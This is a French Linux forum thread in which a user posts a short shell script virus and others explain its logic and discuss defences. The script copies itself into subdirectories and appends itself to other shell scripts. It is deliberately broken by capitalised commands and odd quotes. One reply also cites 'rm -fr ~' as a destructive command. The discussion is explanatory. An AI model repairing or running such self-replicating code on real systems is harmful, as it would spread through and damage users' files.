IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Linux Discussion :

commentaire script virus


Sujet :

Linux

  1. #1
    Nouveau Candidat au Club
    Inscrit en
    Juin 2007
    Messages
    5
    Détails du profil
    Informations forums :
    Inscription : Juin 2007
    Messages : 5
    Points : 1
    Points
    1
    Par défaut commentaire script virus
    bonjour tout le monde
    voila, j'ai chercher sur internet un script de virus pas mechant "dans le cadre académique bien sur", et j'ai trouvé ça,mais j'ai pas compris comment ça marche.
    si quelqu'un peut jetter un oeil sur ça et me dit l'idée generale.
    merci d'avance

    voila le script:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
     
    #!/bin/sh 
    If [ "$1" = ok ] ; then  # $1 : premier argument
      For i in * do 
        If [ - d $i ] ; then  # -d : repertoir
          Cp $0 $i 
          Cd $i
          $0 ok &
          Cd ..
        elif [ -n “’head –n 1 $i | grep –s !/bin/’” ] &&  # -s : fichier non vide     ! : negation  
           [ -z “’grep – TVAR $i’” ] ; then 
           echo >>$i ; tail –n 17 $0 >>$i
        fi
      done
    else
      $0 ok & 
    fi

  2. #2
    Membre chevronné

    Profil pro
    Inscrit en
    Mars 2004
    Messages
    1 296
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mars 2004
    Messages : 1 296
    Points : 1 803
    Points
    1 803
    Par défaut
    vite fait :
    le script scrute tout le repertoire courant
    et pour chaque resultat :
    si repertoire , se recopie dedans et se relance en tache de fond
    si fichier cherche si fichier non vide et shell ????? ( a verifier), alors se recopie dedans le fichier .

    voila ou a peut pret, pas terrible mais probablement un bon moyen de faire un sacré binss sur un repertoire utilisateur (ou root si compte root)

  3. #3
    Nouveau Candidat au Club
    Inscrit en
    Juin 2007
    Messages
    5
    Détails du profil
    Informations forums :
    Inscription : Juin 2007
    Messages : 5
    Points : 1
    Points
    1
    Par défaut toujour avec ce virus
    Merci MarcG pour ta reponse;
    donc comment je peus remedier à ça?(anti virus)
    est ce que je dois faire un script qui empeche de recopier un fichier plusieur fois, ou quoi?
    merci encors une fois pour votre reponse.

  4. #4
    Membre éprouvé
    Avatar de Celelibi
    Profil pro
    Inscrit en
    Janvier 2004
    Messages
    1 087
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2004
    Messages : 1 087
    Points : 1 122
    Points
    1 122
    Par défaut
    La meilleur solution c'est d'avertir les utilisateurs de pas exécuter n'importe quoi.
    Toutes les solutions techniques seront forcément bancales.
    Personnellement je suis partisan du "pas de patch contre la stupidité", c'est à dire que si l'utilisateur veut taper rm -fr ~ c'est son problème, si il exécute un script qui effectue cette même commande, c'est tant pis pour lui.

  5. #5
    Nouveau Candidat au Club
    Inscrit en
    Juin 2007
    Messages
    5
    Détails du profil
    Informations forums :
    Inscription : Juin 2007
    Messages : 5
    Points : 1
    Points
    1
    Par défaut
    merci pour ton avis mais vous savez que c'est toujours evident de laisser les gents faire ce qu'ils veulent.

    est ce que qlq'un peut me comenter cette ligne s'il vou plais.


    elif [ -n “’head –n 1 $i | grep –s !/bin/’” ] && # -s : fichier non vide ! : negation
    [ -z “’grep – TVAR $i’” ] ; then

  6. #6
    Nouveau Candidat au Club
    Inscrit en
    Juin 2007
    Messages
    5
    Détails du profil
    Informations forums :
    Inscription : Juin 2007
    Messages : 5
    Points : 1
    Points
    1
    Par défaut
    merci pour ton avis mais vous savez que c'est toujours evident de laisser les gents faire ce qu'ils veulent.

    est ce que qlq'un peut me comenter cette ligne s'il vou plais.


    elif [ -n “’head –n 1 $i | grep –s !/bin/’” ] && # -s : fichier non vide ! : negation
    [ -z “’grep – TVAR $i’” ] ; then
    echo >>$i ; tail –n 17 $0 >>$i

  7. #7
    Membre éprouvé
    Avatar de Celelibi
    Profil pro
    Inscrit en
    Janvier 2004
    Messages
    1 087
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2004
    Messages : 1 087
    Points : 1 122
    Points
    1 122
    Par défaut
    Quasiment tout est dans le man bash, le reste se trouve dans d'autres man.

    elif <-- contraction de else if
    -n <-- test qui vaut vrai si la chaine testée n'est pas vide
    head -n 1 $i <-- renvoie sur la sortie standard la première ligne du fichier $i
    grep –s !/bin/ <-- récupère les données sur l'entrée standard et ne garde que les lignes qui contiennent "!/bin/" comme la plus part des sheebang.

    Donc si on résume, cette première condition est vrai si la première ligne du fichier contient "!/bin/", autrement dit, si c'est un script dont l'interpréteur se trouve dans /bin et à été noté comme tel (et pas noté avec "env").

    La deuxième condition m'a l'air foireuse, à moins qu'il cherche le motif "-" dans un fichier TVAR. :s

    Si ces deux conditions sont respectées, alors il ajoute un retour à la ligne à la fin du fichier, puis il copie les 17 dernières lignes de son fichier à la fin du fichier $i.



    alice100, tous les unix-like permettent à l'administrateur d'empêcher les utilisateurs de nuire au système. Notamment en donnant des comptes users sans aucun pouvoir.
    Si un utilisateur veut faire des conneries avec ses fichiers personnels, je ne vois pas en quoi cela concerne l'administrateur.
    Si tu estime qu'il y a tout de même un problème quelque part et qu'il faut une solution, c'est peut-être que le problème est ailleurs.

    Les unix-like n'ont jamais eut besoin d'un anti-virus à part pour des cas particuliers comme un webmail pour analyser les pièces-jointes (les virus à détecter son de toutes manières ceux de windows).
    Donc si tu pense en avoir besoin, ou besoin de quelque chose qui s'apparente à un anti-virus alors je pense en toute honnêteté que tu as mal analysé le problème.
    Tu peux nous en parler si tu veux, on pourra chercher la meilleur solution. ^^

  8. #8
    Nouveau Candidat au Club
    Inscrit en
    Juin 2007
    Messages
    5
    Détails du profil
    Informations forums :
    Inscription : Juin 2007
    Messages : 5
    Points : 1
    Points
    1
    Par défaut
    merci boucoup Celelibi pour ta reponse

    oui tu as reson, si c'est un dossier personel, il fait ce qu'il veut.

    donc la solution est de creer des comptes avec aucun droit, c'est plus sur je pense.

    merci boucoup les amis, j'aurais besoin de vous certainement.

    d'ici la, merci bcp

  9. #9
    Nouveau membre du Club
    Profil pro
    Étudiant
    Inscrit en
    Avril 2007
    Messages
    20
    Détails du profil
    Informations personnelles :
    Âge : 35
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : Avril 2007
    Messages : 20
    Points : 25
    Points
    25
    Par défaut
    Je sais pas si c'est bien bon avec les majuscules -> bash va pas aimer :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
     
    $ Cd /home/psikharpax/
    Cd : command not found

  10. #10
    Membre éprouvé
    Avatar de Celelibi
    Profil pro
    Inscrit en
    Janvier 2004
    Messages
    1 087
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Janvier 2004
    Messages : 1 087
    Points : 1 122
    Points
    1 122
    Par défaut
    psikharpax, je pense que beaucoup d'erreur de syntaxes ont été fait pour éviter d'exécuter malencontreusement ce script.

Discussions similaires

  1. Réponses: 6
    Dernier message: 04/07/2008, 09h16
  2. Réponses: 1
    Dernier message: 29/05/2008, 14h16
  3. Réponses: 3
    Dernier message: 27/03/2008, 13h09
  4. [MySQL] Création d'un script php/mysql de commentaires
    Par koKoTis dans le forum PHP & Base de données
    Réponses: 11
    Dernier message: 18/02/2008, 14h56
  5. Commentaire et évaluation d'un script.
    Par nasbe26 dans le forum VBScript
    Réponses: 0
    Dernier message: 22/09/2007, 14h09

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo